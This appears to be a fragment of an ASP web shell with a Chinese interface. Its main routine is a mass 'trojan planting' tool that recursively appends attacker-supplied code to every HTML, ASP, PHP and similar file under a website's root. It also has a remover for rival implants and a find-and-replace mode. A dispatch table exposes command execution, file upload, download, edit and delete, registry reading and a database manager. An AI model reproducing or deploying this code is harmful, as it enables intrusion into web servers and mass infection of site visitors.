    rrs ("<b>本程序目录</b>- "&server.mappath("."))
    rrs "<form method=post><div style='color:#3399ff'><b>[" 
    if m="1" then rrs"批量挂马器-批量挂马"
    if m="2" then rrs"批量清马器-清除别人的网马"
    if m="3" then rrs"批量替换器-文件替换修改工具"
    if m="" then response.end
    rrs "]</b></div><table width=100% border=0><tr><td>文件路径:
</td>"
    rrs "<td><input type=text name=fd value=""\"" size=40> 填“\”
即网站根目录;“.”为程序所在目录</td></tr>"
    if m="1" then rrs "<tr><td>过滤重复:</td><td><input class=c 
name='checkbox' checked='checked' type=checkbox value=""checked"" 
"&checkbox&"> 防止一个页面中有多个重复的代码</td></tr>"

    rrs "<tr><td>排除文件:</td>"
    rrs "<td><input name='pcfile' type=text id='pcfile' 
value='"&pcfile&"' size=40> 输入不想被修改的文件名,例如:
1.asp|2.asp|3.asp</td></tr>"
    rrs "<tr><td>文件类型:</td>"
    rrs "<td><input name='ftype' type=text id='ftype' 
value='"&ftype&"' size=40> 输入要修改的文件类型[扩展名],例如:
htm|html|asp|php|jsp|aspx|cgi</td></tr><tr><td><font color=#3399ff>"
    if m="1" then rrs"要挂的马:"
    if m="2" then rrs"要清的马:"
    if m="3" then rrs"查找内容:"
    rrs"</font></td><td><textarea name=code cols=66 
rows=3>"&addcode&"</textarea></td></tr>"
    if m="3" then rrs "<tr><td><font color=#3399ff>替 换 为:
</font></td><td><textarea name=code2 cols=66 
rows=3>"&addcode&"</textarea></td></tr>"
    rrs "<tr><td></td><td> <input name=submit type=submit value=开
始执行> --标记解释--[成功:√ , 排除:× , 重复:<font color=red>×
</font>]</td></tr>"
    rrs "</table></form>" 
if request("submit")="开始执行" then 
rrs"<div style='line-height:25px'><b>执行记录:</b><br>"
call insertallfiles(fpath,addcode,pcfile)
rrs"</div>"
end if
sub insertallfiles(wpath,wcode,pc)
    server.scripttimeout=999999999
     if right(wpath,1)<>"\" then wpath=wpath &"\"
     set wfso = createobject("scripting.filesystemobject")
     on error resume next 
     set f = wfso.getfolder(wpath)
     set fc2 = f.files
     for each myfile in fc2
        set fs1 = createobject("scripting.filesystemobject")
        ftype1=split(myfile.name,".") 
        ftype2=ubound(ftype1) 
        if ftype2>0 then
        ftype3=lcase(ftype1(ftype2)) 
        else
        ftype3="无"
        end if
        if instr(lcase(pc),lcase(myfile.name))=0 and instr
(lcase(ftype),ftype3)<>0 then
            select case m
                case "1"
                    if checkbox<>"checked" then
                        set 
tfile=fs1.opentextfile(wpath&""&myfile.name,8,-2)
                    if left(myfile.name,4)="conn" 
then
                        tfile.write
                        rrs"√  
"&wpath&myfile.name
                        else
                        tfile.writeline wcode
                        rrs"√ 
"&wpath&myfile.name
                        tfile.close
                    end if
                    end if    
                    if checkbox="checked" then
                        set 
tfile1=fs1.opentextfile(wpath&""&myfile.name,1,-2)
                        if instr
(tfile1.readall,wcode)=0 then
                            set 
tfile=fs1.opentextfile(wpath&""&myfile.name,8,-2)
                        if left(myfile.name,4)
="conn" then
                        tfile.write
                        rrs"× 
"&wpath&myfile.name
                        else
                        tfile.writeline wcode
                            rrs"√  
"&wpath&myfile.name
                            tfile1.close
                        end if    
                        else
                            rrs"<font 
color=red>×</font> "&wpath&myfile.name
                            tfile1.close
                        end if
                        set tfile1=nothing
                    end if
                case "2"
                    set tfile1=fs1.opentextfile
(wpath&""&myfile.name,1,-2)
                    newcode=replace
(tfile1.readall,wcode,"")
                    set 
objcountfile=wfso.createtextfile(wpath&myfile.name,true)
                    objcountfile.write newcode
                    objcountfile.close
                    rrs"√  "&wpath&myfile.name
                    set objcountfile=nothing
                case "3"
                    set tfile1=fs1.opentextfile
(wpath&""&myfile.name,1,-2)
                    newcode=replace
(tfile1.readall,wcode,addcode2)
                    set 
objcountfile=wfso.createtextfile(wpath&myfile.name,true)
                    objcountfile.write newcode
                    objcountfile.close
                    rrs"√  "&wpath&myfile.name
                    set objcountfile=nothing
                case else
                    rrs"大哥,别乱来.":response.end
            end select
        else
            rrs"× "&wpath&myfile.name
        end if
rrs " → <a href='javascript:fullform("""&replace
(wpath&myfile.name,"\","\\")&""",""downfile"")' class='am' title='下
载'>下载</a> "
rrs "<a href='javascript:fullform("""&replace
(wpath&myfile.name,"\","\\")&""",""editfile"")' class='am' title='编
辑'>编辑</a> "
rrs "<a href='javascript:fullform("""&replace(str1,"\","\\")
&""",""delfile"")'  onclick='return yesok()' class='am' title='删除'>删
除</a> "
rrs "<a href='javascript:fullform("""&replace
(wpath&myfile.name,"\","\\")&""",""copyfile"")' class='am' title='复
制'>复制</a> "
rrs "<a href='javascript:fullform("""&replace
(wpath&myfile.name,"\","\\")&""",""movefile"")' class='am' title='移
动'>移动</a><br>"
     next
 set fsubfolers = f.subfolders
 for each f1 in fsubfolers
    newpath=wpath&""&f1.name
     insertallfiles newpath,wcode,pc
 next
set tfile=nothing
set fso = nothing
set tfile=nothing
set tfile2=nothing
set wfso = nothing
end sub
  case "readreg":call readreg()
  case "show1file":set abc=new lbf:abc.show1file(session
("folderpath")):set abc=nothing
  case "downfile":downfile fname:showerr()
  case "delfile":set abc=new lbf:abc.delfile(fname):set abc=nothing
  case "editfile":set abc=new lbf:abc.editfile(fname):set abc=nothing
  case "copyfile":set abc=new lbf:abc.copyfile(fname):set abc=nothing
  case "movefile":set abc=new lbf:abc.movefile(fname):set abc=nothing
  case "delfolder":set abc=new lbf:abc.delfolder(fname):set abc=nothing
  case "copyfolder":set abc=new lbf:abc.copyfolder(fname):set 
abc=nothing
  case "movefolder":set abc=new lbf:abc.movefolder(fname):set 
abc=nothing
  case "newfolder":set abc=new lbf:abc.newfolder(fname):set abc=nothing
  case "upfile":upfile()
  case "cmd1shell":cmd1shell()
  case "logout":session.contents.remove("web2a2dmin"):response.redirect 
url
  case "dbmanager":dbmanager()
  case "course":course()
  case "serverinfo":serverinfo()
  case else mainform()
end select
if action<>"servu" then showerr()
rrs"</body></html>"
%>